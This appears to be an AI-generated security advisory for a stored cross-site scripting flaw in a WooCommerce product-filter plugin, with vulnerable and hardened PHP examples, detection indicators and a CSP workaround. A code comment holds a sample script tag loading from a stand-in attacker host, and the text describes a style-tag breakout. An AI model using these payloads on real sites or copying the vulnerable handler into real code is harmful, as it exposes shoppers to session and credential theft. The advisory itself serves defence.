CVE-2020-37174 Overview
CVE-2020-37174 is a persistent (stored) cross-site scripting vulnerability in version 1.2.3 of the WOOF Products Filter for WooCommerce plugin [CWE-79]. An authenticated attacker with administrative access can inject JavaScript through text fields on the plugin's design tab, including Text for block toggle and Custom front css styles. The injected markup is stored in the WordPress database and executes in the browser of every visitor who loads a frontend page that renders the affected filter widget. The flaw stems from missing input sanitization and output encoding in the plugin's settings handlers.
Critical Impact
Stored XSS payloads execute against every frontend visitor, enabling session theft, credential harvesting, and drive-by malware delivery against WooCommerce shoppers.
Affected Products
- WOOF Products Filter for WooCommerce plugin version 1.2.3
- WordPress sites using the affected plugin version with WooCommerce
- Frontend visitors of any storefront running the vulnerable plugin build
Discovery Timeline
- 2026-05-13 - CVE-2020-37174 published to the National Vulnerability Database (NVD)
- 2026-05-13 - Last updated in NVD database
Technical Details for CVE-2020-37174
Vulnerability Analysis
The plugin exposes administrative configuration fields under its design tab without enforcing server-side sanitization or contextual output escaping. An authenticated administrator submits arbitrary HTML or JavaScript through fields such as Text for block toggle and Custom front css styles. The plugin stores the raw input in the WordPress options table and renders it verbatim on product filter pages. Any visitor loading a page that includes the filter widget triggers the stored payload in their browser context.
The issue is classified under [CWE-79] (Improper Neutralization of Input During Web Page Generation). In a WooCommerce storefront, persistent XSS exposes shopper sessions, checkout flows, and customer account data. A single compromised administrator account, or a malicious setting planted through the plugin supply chain, therefore turns into impact on every visitor of every page that renders the widget.
Root Cause
The plugin trusts administrator-supplied configuration values and writes them directly into rendered HTML and inline CSS blocks. The output path omits the standard WordPress escaping helpers (esc_html(), esc_attr(), wp_kses()) for the HTML contexts, and the CSS value is emitted inside the <style> element without tag stripping, so a value can close that element with </style> and open a <script> element; legacy expression() syntax is passed through in the same way.
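To make the root cause concrete, here is an added illustrative example; it is not the WOOF plugin's code. It shows a settings handler and renderer in the vulnerable shape described above beside a hardened version that registers a sanitize callback and escapes per output context. The option name woof_design_demo, the field keys toggle_text and front_css, and the woof_demo_* function names are assumptions made for the example.

```php
<?php
// Added illustrative example, not the WOOF plugin's code. Option name, field keys and
// function names (woof_design_demo, toggle_text, front_css, woof_demo_*) are assumptions.

// ---------- Vulnerable shape: raw input stored, then echoed verbatim ----------
function woof_demo_save_unsafe() {
    // No capability check, no nonce, no sanitize step: whatever was POSTed lands in wp_options.
    update_option( 'woof_design_demo', array(
        'toggle_text' => wp_unslash( $_POST['toggle_text'] ?? '' ),
        'front_css'   => wp_unslash( $_POST['front_css'] ?? '' ),
    ) );
}

function woof_demo_render_unsafe() {
    $s = get_option( 'woof_design_demo', array() );
    // HTML text context: "<script src=//attacker.example/x.js></script>" runs for every visitor.
    echo '<a class="woof_toggle">' . ( $s['toggle_text'] ?? '' ) . '</a>';
    // CSS raw-text context: "</style><script>...</script>" leaves the style block and runs script.
    echo '<style>' . ( $s['front_css'] ?? '' ) . '</style>';
}

// ---------- Hardened shape: sanitize on save, escape per context on output ----------
function woof_demo_sanitize( $input ) {
    $input = is_array( $input ) ? $input : array();
    $clean = array();
    // A toggle label is plain text: sanitize_text_field() strips tags, octets and line breaks.
    $clean['toggle_text'] = sanitize_text_field( $input['toggle_text'] ?? '' );
    // Custom CSS: remove every tag (this also removes any "</style" or "<script"), then refuse
    // legacy script-bearing CSS. Rejecting rather than cleaning is a deliberately strict choice.
    $css = wp_strip_all_tags( $input['front_css'] ?? '' );
    if ( preg_match( '#expression\s*\(|javascript\s*:|behavior\s*:|-moz-binding#i', $css ) ) {
        add_settings_error( 'woof_design_demo', 'woof_bad_css',
            'Custom CSS rejected: it contains a script-bearing construct.' );
        $css = '';
    }
    $clean['front_css'] = $css;
    return $clean;
}

// Registering the option with a sanitize_callback makes options.php run it on every save;
// options.php also enforces the manage_options capability and the settings nonce.
add_action( 'admin_init', function () {
    register_setting( 'woof_design_demo_group', 'woof_design_demo', array(
        'type'              => 'array',
        'sanitize_callback' => 'woof_demo_sanitize',
    ) );
} );

function woof_demo_render_safe() {
    $s = get_option( 'woof_design_demo', array() );
    // Escape for the HTML text context at output time even though the input was sanitized:
    // a value written to wp_options by another route (SQL, WP-CLI, an older plugin build) is not clean.
    echo '<a class="woof_toggle">' . esc_html( $s['toggle_text'] ?? '' ) . '</a>';
    // <style> is a raw-text element: entities are not decoded there, so esc_html() would turn
    // "a > b" into broken CSS. Strip tags instead, as WordPress core does for its Additional CSS.
    echo '<style>' . wp_strip_all_tags( $s['front_css'] ?? '' ) . '</style>';
}
```

The hardened form only takes effect for saves that go through options.php with settings_fields( 'woof_design_demo_group' ) on the form; a plugin that saves settings through its own AJAX handler has to call the sanitize function itself and check the capability and nonce explicitly. Escaping at output is kept even after sanitizing on save, because the stored value is the untrusted boundary.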
Attack Vector
Exploitation requires authenticated access at the privilege level needed to edit plugin settings, plus a victim visit to a frontend page that renders the affected widget. The attacker opens the plugin's design tab, enters a payload such as a <script> tag in Text for block toggle or a </style><script>...</script> breakout in Custom front css styles, and saves the configuration. The payload then executes for every subsequent frontend visitor.
Verified proof-of-concept details are available in the Exploit-DB entry #48088 and the VulnCheck advisory on the persistent XSS. No verified patch code is published in the NVD record.
Detection Methods for CVE-2020-37174
Indicators of Compromise
- Unexpected <script>, onerror=, javascript: or </style> content stored in the (usually PHP-serialized) wp_options rows belonging to the WOOF Products Filter plugin.
- Outbound requests from visitor browsers to attacker-controlled domains originating from product filter pages.
- Modifications to plugin settings outside of normal change windows, recorded in WordPress audit logs.
Detection Strategies
- Review the plugin's stored configuration values for HTML or JavaScript tokens that should not appear in design text or CSS fields.
- Enable Content Security Policy (CSP) reporting and watch for inline-script violations triggered on storefront pages.
- Compare current plugin option values against a known-good baseline after each administrative change.
Monitoring Recommendations
- Forward WordPress and web server logs to a centralized analytics platform and alert on administrator settings changes for the WOOF Products Filter plugin.
- Monitor frontend page responses for unexpected inline script tags or suspicious CSS expressions in filter widget markup.
- Track anomalous administrator authentication events that precede modifications to plugin design fields.
How to Mitigate CVE-2020-37174
Immediate Actions Required
- Audit current values in all WOOF Products Filter design tab fields and remove any HTML, JavaScript, or CSS breakout content.
- Restrict administrative access to trusted accounts and enforce multi-factor authentication for WordPress administrators.
- Deploy a web application firewall (WAF) rule that blocks <script> and event-handler attributes in plugin settings POST requests, as defence in depth only: an attacker who already holds administrator access can encode or split the payload, so the rule does not substitute for patching.
Patch Information
The NVD record does not list a fixed version. Site operators should upgrade to the latest available release of the WOOF Products Filter for WooCommerce plugin and verify the changelog references sanitization of design tab inputs. If no fixed release is available, replace the plugin with an alternative or disable it.
Workarounds
- Remove the plugin from WordPress installations that do not require it and clear cached frontend pages after removal.
- Apply a Content Security Policy that disallows inline scripts on storefront pages to neutralize stored payloads; WordPress core and WooCommerce emit inline scripts of their own, so allow those through nonces or hashes rather than 'unsafe-inline'.
- Limit the manage_options and equivalent capabilities to a minimal set of trusted administrators using role management.
# Example CSP header (Apache mod_headers) to block inline script execution on WooCommerce pages.
# Trial it as Content-Security-Policy-Report-Only first: these directives also block WordPress's own inline scripts.
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'; base-uri 'self'"
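A header that bans inline scripts outright breaks storefronts, because WordPress prints wp_localize_script() data and WooCommerce parameters as inline <script> blocks. The following is an added example, not part of the advisory or the plugin, of the nonce-based variant: a must-use plugin that sends a per-request nonce in the policy and stamps it on every script tag WordPress prints through its own API, so core's inline scripts keep running while a stored <script> payload in the filter widget, which carries no nonce, is refused. It assumes WordPress 5.7 or later (which added the wp_script_attributes and wp_inline_script_attributes filters), and the function names and the /csp-report endpoint are assumptions.

```php
<?php
// Added example, not part of the advisory or the WOOF plugin. Assumes WordPress 5.7+.
// Save as wp-content/mu-plugins/csp-nonce.php. Function names and the report endpoint are assumptions.

function csp_demo_nonce(): string {
    static $nonce = null;
    if ( $nonce === null ) {
        $nonce = base64_encode( random_bytes( 16 ) );   // one fresh value per request
    }
    return $nonce;
}

// send_headers fires for front-end requests only, before any output, and never in wp-admin.
add_action( 'send_headers', function () {
    if ( headers_sent() ) {
        return;
    }
    $nonce  = csp_demo_nonce();
    $policy = implode( '; ', array(
        "default-src 'self'",
        "script-src 'self' 'nonce-{$nonce}'",   // inline script needs the nonce; a stored payload has none
        "style-src 'self' 'unsafe-inline'",     // inline CSS cannot execute script in current browsers
        "img-src 'self' data: https:",          // product images and gateway badges often come from CDNs
        "object-src 'none'",
        "base-uri 'self'",
        "report-uri /csp-report",               // assumption: an endpoint that stores violation reports
    ) );
    header( 'Content-Security-Policy: ' . $policy );
} );

// Stamp the nonce on every <script> tag WordPress emits via its API: enqueued files,
// wp_localize_script() data blocks and wp_add_inline_script() snippets.
$csp_demo_add_nonce = function ( array $attributes ): array {
    $attributes['nonce'] = csp_demo_nonce();
    return $attributes;
};
add_filter( 'wp_script_attributes', $csp_demo_add_nonce );
add_filter( 'wp_inline_script_attributes', $csp_demo_add_nonce );
```

Two caveats before enforcing it: themes or plugins that write <script> tags by hand instead of through wp_enqueue_script() or wp_add_inline_script() never receive the nonce and will be blocked, so run the same policy under Content-Security-Policy-Report-Only first and read the reports; and a full-page cache that serves stored HTML with a stale nonce defeats the scheme, so the cache must either be bypassed for these pages or substitute the nonce at delivery time.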
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


